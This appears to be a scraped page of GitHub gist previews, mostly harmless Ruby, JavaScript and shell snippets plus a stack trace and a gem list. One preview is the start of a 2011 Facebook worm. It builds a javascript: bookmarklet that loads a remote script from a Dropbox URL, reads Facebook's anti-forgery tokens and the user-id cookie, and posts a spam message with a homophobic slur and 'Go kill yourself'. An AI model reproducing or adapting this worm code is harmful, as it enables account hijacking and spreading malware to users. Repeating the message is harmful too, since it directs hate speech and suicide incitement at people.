This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Run this file with `RAILS_ENV=production rackup -p 3000 -s thin` | |
# Be sure to have rails and thin installed. | |
require "rubygems" | |
# We are not loading Active Record, nor the Assets Pipeline, etc. | |
# This could also be in your Gemfile. | |
gem "actionpack", "~> 3.2" | |
gem "railties", "~> 3.2" | |
# The following lines should come as no surprise. Except by |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
class PostsController < ActionController::Base | |
def create | |
Post.create(post_params) | |
end | |
def update | |
Post.find(params[:id]).update_attributes!(post_params) | |
end | |
private |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Author: Pieter Noordhuis | |
# Description: Simple demo to showcase Redis PubSub with EventMachine | |
# | |
# Update 7 Oct 2010: | |
# - This example does *not* appear to work with Chrome >=6.0. Apparently, | |
# the WebSocket protocol implementation in the cramp gem does not work | |
# well with Chrome's (newer) WebSocket implementation. | |
# | |
# Requirements: | |
# - rubygems: eventmachine, thin, cramp, sinatra, yajl-ruby |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// loop through the 'paper' variable from Raphael JS and build up the JSON object describing all images and paths within it. | |
loadJSON = function(paper, json) { | |
var set = paper.set(); | |
$.each(json, function(index, node) { | |
try { | |
var el = paper[node.type]().attr(node); | |
set.push(el); | |
} catch(e) {} | |
}); | |
return set; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function doGet(e) { | |
try{ | |
var app = UiApp.createApplication(); | |
var mainPanel = app.createVerticalPanel(); | |
var emailTable = app.createFlexTable().setId("emailTable"); | |
app.add(mainPanel); | |
mainPanel.add(emailTable); | |
var mail = GmailApp.getInboxThreads(0, 10); | |
for (var i = mail.length; i > 0; i--) { | |
var msg = mail[i-1]; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// 5/11/11 Facebook hack -- Started spreading and was quickly taken down by Dropbox (where the file was hosted). | |
var message = "Fuck you faggot. Go kill yourself. Do whatever the fuck you want. I hate you and the only way to remove all these posts is by disabling this below."; | |
var jsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://dl.dropbox.com/u/10505629/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();"; | |
var myText = "Remove This App"; | |
var post_form_id = document.getElementsByName('post_form_id')[0].value; | |
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; | |
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
guto@server:~/scm/git/intranet-stage$ rails c | |
/usr/local/rvm/gems/ruby-1.9.2-p180@intranet-with-sequel/bundler/gems/tiny_tds-ef384b4cddba/lib/tiny_tds/client.rb:57:in `connect': TinyTds::Error: Unable to open socket (Sequel::DatabaseConnectionError) | |
from /usr/local/rvm/gems/ruby-1.9.2-p180@intranet-with-sequel/bundler/gems/tiny_tds-ef384b4cddba/lib/tiny_tds/client.rb:57:in `initialize' | |
from /usr/local/rvm/gems/ruby-1.9.2-p180@intranet-with-sequel/gems/sequel-3.21.0/lib/sequel/adapters/tinytds.rb:16:in `new' | |
from /usr/local/rvm/gems/ruby-1.9.2-p180@intranet-with-sequel/gems/sequel-3.21.0/lib/sequel/adapters/tinytds.rb:16:in `connect' | |
from /usr/local/rvm/gems/ruby-1.9.2-p180@intranet-with-sequel/gems/sequel-3.21.0/lib/sequel/database/misc.rb:45:in `block in initialize' | |
from /usr/local/rvm/gems/ruby-1.9.2-p180@intranet-with-sequel/gems/sequel-3.21.0/lib/sequel/connection_pool.rb:92:in `call' | |
from /usr/local/rvm/gems/ruby-1.9.2-p180@intranet-with-sequel/gems/sequel- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
*** LOCAL GEMS *** | |
abstract (1.0.0) | |
actionmailer (3.0.3) | |
actionpack (3.0.3) | |
activemodel (3.0.3) | |
activerecord (3.0.3) | |
activerecord-jdbc-adapter (1.1.1) | |
activerecord-jdbcsqlite3-adapter (1.1.1) | |
activeresource (3.0.3) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
port: 3000 | |
ajp: | |
port: 8009 | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#! /bin/sh | |
# Generic script for running ruby scripts as daemons using | |
# jsvc and a java class to control the daemon. | |
# | |
# Contains common parameters and start/stop | |
# Things you'll need to set on a per script/daemon basis: | |
# SCRIPT_NAME - Path to the ruby script which creates a Daemon | |
# object for jsvc to control | |
# APP_NAME - Name of your application |